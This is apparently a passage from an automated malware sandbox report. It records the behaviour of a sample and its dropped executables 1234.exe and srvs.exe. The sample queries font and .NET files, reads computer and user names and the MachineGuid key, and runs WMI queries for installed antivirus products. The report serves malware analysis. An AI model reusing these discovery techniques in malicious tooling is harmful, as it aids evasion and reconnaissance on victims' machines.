                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Users\user\AppData\Roaming\1234.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C22A8 GetLocalTime,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004F760 GetComputerNameW,GetUserNameW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140001270 GetModuleHandleW,GetProcAddress,GetVersionExW,
                      Source: C:\Users\user\AppData\Roaming\1234.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
